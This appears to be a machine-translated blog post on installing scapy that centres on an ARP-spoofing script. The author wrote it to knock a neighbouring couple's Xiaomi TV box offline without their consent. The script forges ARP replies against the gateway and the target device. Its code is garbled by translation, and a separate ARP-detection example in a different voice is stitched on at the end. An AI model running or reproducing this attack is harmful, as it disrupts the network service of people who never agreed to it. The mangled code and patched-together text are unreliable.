Learn scapy and how to learn scrapy

Source: Internet
Author: User


 

I came across the scapy tool not long ago. Its strength lies in its ability to modify data packets, and because it is based on Python it is convenient to use.

I really started to study TCP/IP half a year ago, but I was confused after reading the FreeRTOS-TCP/IP source code for a month. Fortunately, I understood a lot about the TCP/IP protocol.

I became familiar with Python a month ago.

 

Installing scapy on Ubuntu 14.04

 

Because Python 2.7 is already installed on my system but pip is not, install pip first.

sudo apt-get install python-pip

If it fails, try the following command:

sudo apt-get update --fix-missing

Install scapy after pip is installed.

sudo pip install scapy

Now scapy has been installed. You can test it as follows:

vmuser@Linux-host:~/Desktop$ python
Python 2.7.3 (default, Oct 26 2016, 21:04:23)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from scapy.all import *
>>> a = IP()
>>> a
<IP  |>
>>> get_if_hwaddr("eth0")
'00:0c:29:70:b1:85'

eth0 is my NIC.

 

Python 3.6

 

pip install scapy

Or

pip3 install scapy-python3

 

ARP attack example (1)

 

Hardware Platform: Dragon Board Objective C

System: Debian

Python: 2.7.

I rent a room on my own and have never disturbed the neighbors. Recently, some tenants have been watching TV with the sound on. I had a development board at hand and planned to use scapy to launch ARP attacks to bring them offline.

Here is a brief introduction to the principle of ARP attacks. Basically, the attacker forges packets to pollute the ARP cache table of a host or of the gateway. More complicated variants pretend to be the gateway or act as a man in the middle. So how can this problem be solved?

First, you need to know what kind of device the other party is using. Use a LAN scanning tool to scan for active hosts, then identify each device from its MAC address. The scan result is as follows:

C8-3A-35-C0-05-15 Tenda Technology Co., Ltd.
04-E6-76-46-A6-F3 AMPAK Technology, Inc.
78-02-F8-34-4D-B5 private
24-09-95-95-E2-02 HUAWEI TECHNOLOGIES CO., LTD
20-47-47-BA-99-1E Dell Inc.
70-14-A6-37-3F-0F Apple, Inc.
E8-B4-C8-7B-F3-0F Samsung Electronics Co., Ltd
48-3B-38-D9-8D-D8 Apple, Inc.

"AMPAK" is the most suspicious. A Baidu search identified it as a Xiaomi box. (Problem: AMPAK has been detected multiple times during IP scanning ....)

With the MAC locked in, I guess they (an old couple watching TV every day!!) cannot escape.

 

1 #! /Usr/bin/env python 2 # _ * _ coding = UTF-8 _ * _ 3 4 from scapy. all import * 5 import time 6 import random 7 # ------------------------------------------------------- 8 def GetSubNet (OurIP): 9 ''' 10 get the subnet, 192.168.0 11 ''' 12 Index = 0 13 SubString = "" 14 while True: 15 num = OurIP. find ('. ', Index) 16 if num! =-1: 17 Index = num + 1 18 if num =-1: 19 SubString = OurIP [: Index] 20 break 21 return SubString 22 # define 23 def GetMac (tgtIP): 24''' 25. Obtain the MAC address of the target IP address. 26 tgtIP: Target IP address 27 ''' 28 try: 29 tgtMac = getmacbyip (tgtIP) 30 return tgtMac 31 fingerprint T: 32 print (tgtIP, "check whether the target IP address is alive ") 33 # ------------------------------------------------------- 34 def GetBrocastIP (OurIP): 35 ''' 36 get Lan broadcast address 37 OurIP: Our IP address 38 ''' 39 return GetSubNet (OurIP) + "255" 40 # ------------------------------------------------------- 41 def GetForgetIP (OurIP, Num): 42''' 43 forged IP address 44 O UrIP: our own IP address 45 Num: How many IP addresses are forged: 46 ''' 47 SubString = GetSubNet (OurIP) 48 # counterfeit IP 49 ForgetIP = [] 50 I = 0 51 while I <Num: 52 num = int (random. uniform (0,255) 53 TempIP = SubString + "% d" % num 54 if TempIP = OurIP: 55 continue 56 else: 57 ForgetIP. append (TempIP) 58 I = I + 1 59 return ForgetIP 60 # --------------------------------------------------------- 61 def GetForgeMac (OurMac, Num): 62''' 63 generation Host MAC address 64 OurMac: We can't repeat ourselves with our own MAC address. 65 '''66 ForgeMac = [] 67 j = 0 68 while j <Num: 69 while True: 70 I = 0 71 TempMac = "" 72 while I <6: 73 num = int (random. uniform (0,255) 74 TempMac = TempMac + "% 02X" % num 75 if I <= 4: TempMac = TempMac + ": "76 I = I + 1 77 if TempMac = OurMac: 78 pass 79 else: 80 ForgeMac. 
append (TempMac) 81 j = j + 1 82 break 83 return ForgeMac 84 #--------------------- -------------------------------- 85 def AttackMac (Mac, face, Num, Interval, GW_IP): 86 ''' 87 attacks MAC 88 Mac: MAC address 89 face: network Interface for sending attack packets 90 GW: whether to only attack the gateway 91 ''' 92 Broadcast_mac = "FF: FF "93 GW_MAC =" "94 try: 95 OurIP = get_if_addr (face) 96 if GW_IP! = "": GW_MAC = GetMac (GW_IP) 97 packet T: 98 OurIP = "192.168.0.105" 99 return100 Broadcast_ip = GetBrocastIP (OurIP) 101 while True: 102 ForgeIP = GetForgetIP (OurIP, Num) 103 # generate a data packet 104 if GW_IP! = "": 105 # attack gateway 106 pkt = Ether (dst = GW_MAC, src = Mac)/\ 107 ARP (psrc = ForgeIP, pdst = GW_IP, \ 108 hwsrc = Mac, hwdst = GW_MAC, op = 2) 109 else: 110 # attack 111 pkt = Ether (dst = Broadcast_mac, src = Mac)/\ 112 ARP (psrc = ForgeIP, pdst = Broadcast_ip, \ 113 hwsrc = Mac, op = 1) 114 # send data packet 115 try: 116 # print (ls (pkt) 117 # input () 118 sendp (pkt, iface = face) 119 bytes T: 120 print ("!! Send Error !! 121 break122 time. sleep (float (Interval) 123 # define 124 def AttackIP (tgtIP, face, Num, Interval, GW_IP): 125 ''' 126 attack IP address 127 tgtIP: Target IP128 face: nic interface 129 Num: Number of attack packets 130 Interval: Attack Interval 131 ''' 132 # broadcast address 133 GW_MAC = "" 134 Broadcast_mac = "FF: FF "135 # local 136 try: 137 OurMac = get_if_hwaddr (face) 138 OurIP = get_if_addr (face) 139 if GW_IP! = "": GW_MAC = GetMac (GW_IP) 140 running T: 141 OurMac = "00: 00: 00: 00: 00: 00: 00 "142 OurIP =" 192.168.0.105 "143 Broadcast_ip = GetBrocastIP (OurIP) 144 while True: 145 # Prepare data packets 146 ForgeMac = GetForgeMac (OurMac, Num) 147 if GW_IP! 
= "": 148 # attack gateway 149 pkt = Ether (dst = GW_MAC, src = ForgeMac)/\ 150 ARP (psrc = tgtIP, pdst = GW_IP, \ 151 hwsrc = ForgeMac, hwdst = GW_MAC, op = 2) 152 else: 153 # attack 154 pkt = Ether (dst = Broadcast_mac, src = ForgeMac)/\ 155 ARP (psrc = tgtIP, pdst = Broadcast_ip, \ 156 hwsrc = ForgeMac, op = 1) 157 # send data packets 158 try: 159 sendp (pkt, iface = face) 160 bytes T: 161 print ("!! Send Error !! ") 162 break163 # delay 164 time. sleep (float (Interval) 165 # ----------------------------------------------------- 166 Table ={} 167 def Scanf (OurIP, Start, End): 168 ''' 169 scan network, get the IP-MAC and save 170 OurIP: Our IP address 171 Start: Scan Start address 172 End: Scan End address 173 for example: OurIP = 192.168.0.105, Start = 99, End = 150174 scan IP Range: 192.168.0.99 ~ 192.168.0.150175 ''' 176 SubString = GetSubNet (OurIP) 177 for num in range (Start, End): 178 ip = SubString + str (num) 179 arpPkt = Ether (dst = "ff: ff")/ARP (pdst = ip, hwdst = "ff: ff: ff ") 180 res = srp1 (arpPkt, timeout = 1, verbose = 0) 181 if res: 182 Table [res. psrc] = res. hwsrc183 return Table184 # ------------------------------------------------------- 185 def GetIpByMac (Mac): 186 if len (Table) = 0: return None187 return Table. 
get (Mac) 188 189 def Attack_xiaomi (Face, PackNum, Counter, Interval): 190 ''' 191 attack Xiaomi box 192 Face: Nic interface 193 PackNum: number of packets 194 Counter: number of attacks (-1: Unlimited) 195 Interval: Attack Interval 196 for example: Face = "wlan0", PackNum = 10, Counter =-1, interval = 1197 ''' 198 MY_ip = get_if_addr (Face) 199 MY_mac = get_if_hwaddr (Face) 200 if MY_ip = None or MY_mac = None: return201 202 GW_ip = "192.168.0.1" 203 GW_mac = GetMac (GW_ip) 204 if GW_mac = None: return205 206 Scanf (MY_ip, 99,150) 207 208 XM_mac = "04: E6: 76: 46: A6: f3 "209 XM_ip = encrypt (XM_mac) 210 if XM_ip = None: return211 212 while True: 213 # Attack packs214 Temp_mac = GetForgeMac (MY_mac, PackNum) 215 Temp_ip = GetForgetIP (MY_ip, packNum) 216 217 PKT_2_XM_4_mac = Ether (src = GW_mac, dst = XM_mac)/ARP (psrc = Temp_ip, pdst = XM_ip, op = 2) 218 PKT_2_XM_4_ip = Ether (src = Temp_mac, dst = XM_mac)/ARP (psrc = GW_ip, pdst = XM_ip, op = 2) 219 PKT_2_GW_4_XM_mac = Ether (src = XM_mac, dst = GW_mac) /ARP (psrc = Temp_ip, pdst = GW_ip, op = 2) 220 PKT_2_GW_4_XM_ip = Ether (src = Temp_mac, dst = GW_mac)/ARP (psrc = XM_ip, pdst = GW_ip, op = 2) 221 try: 222 sendp (PKT_2_XM_4_mac, iface = Face) 223 time. sleep (0.5) 224 sendp (PKT_2_XM_4_ip, iface = Face) 225 time. sleep (0.5) 226 sendp (PKT_2_GW_4_XM_mac, Iface = Face) 227 time. sleep (0.5) 228 sendp (PKT_2_GW_4_XM_ip, iface = Face) 229 bytes T: 230 print ("!! Send Error !! ") 231 # sleepw.num = int (random. uniform (0, Interval) 233 time. sleep (num) 234 if Counter =-pass236 else: 237 Counter = Counter-1238 if Counter = 0: 239 return240 241 if _ name _ = "_ main _": 242 # while True: 243 # AttackIP ("192.168.0.108", "wlan0", 244, "192.168.0.1") 245 # AttackMac (Mac, face, Num, Interval, GW_IP): # AttackMac ("C8: 3A: 35: C0: 05: 15 "," wlan0 ", 246," 192.168.0.108 ") 247 while True: Attack_xiaomi (" wlan0 ", 5)
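Seen from the defender's side, the cache pollution described above appears on the wire as ARP packets that bind a known IP address to a new MAC, or as one MAC claiming many IPs. The following is an added example, not part of the original post: a standard-library parser and watcher for raw ARP frames, where the sample frames, the 192.0.2.x and 02:00:... addresses and the fan-out threshold are constructed assumptions.

```python
import struct
from collections import defaultdict

def _mac(b):
    return ":".join("%02x" % x for x in b)
def _ip(b):
    return ".".join(str(x) for x in b)

def parse_arp(frame):
    """Return (op, sender_mac, sender_ip, ether_src), or None if not Ethernet/IPv4 ARP."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return op, _mac(frame[22:28]), _ip(frame[28:32]), _mac(frame[6:12])

class ArpWatch:
    def __init__(self, max_ips_per_mac=3):   # threshold is an assumption
        self.ip_to_mac = {}                  # first binding seen is the baseline
        self.mac_to_ips = defaultdict(set)
        self.max_ips_per_mac = max_ips_per_mac
    def observe(self, frame):
        parsed = parse_arp(frame)
        if parsed is None:
            return []
        _op, smac, sip, eth_src = parsed
        alerts = []
        if smac != eth_src:                  # ARP payload disagrees with the frame header
            alerts.append("mismatch: ARP sender %s, Ethernet source %s" % (smac, eth_src))
        known = self.ip_to_mac.setdefault(sip, smac)
        if known != smac:                    # an already-seen IP is claimed by a new MAC
            alerts.append("rebind: %s was %s, now claimed by %s" % (sip, known, smac))
        self.mac_to_ips[smac].add(sip)
        if len(self.mac_to_ips[smac]) > self.max_ips_per_mac:
            alerts.append("fan-out: %s claims %d IPs" % (smac, len(self.mac_to_ips[smac])))
        return alerts

def make_frame(eth_src, smac, sip, op=2):
    """Build a constructed broadcast ARP frame for testing (not captured traffic)."""
    m = lambda s: bytes(int(x, 16) for x in s.split(":"))
    i = lambda s: bytes(int(x) for x in s.split("."))
    return (b"\xff" * 6 + m(eth_src) + b"\x08\x06" +
            struct.pack("!HHBBH", 1, 0x0800, 6, 4, op) +
            m(smac) + i(sip) + b"\x00" * 6 + i("192.0.2.50"))

if __name__ == "__main__":
    w, gw, other = ArpWatch(), "02:00:00:00:00:01", "02:00:00:00:00:99"
    for src in (gw, other):                  # second frame rebinds 192.0.2.1
        print(w.observe(make_frame(src, src, "192.0.2.1")))
```

On a network with static addressing, pinning the gateway's IP-to-MAC binding (a static ARP entry or switch-level ARP inspection) removes the need to trust the first binding seen.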

 
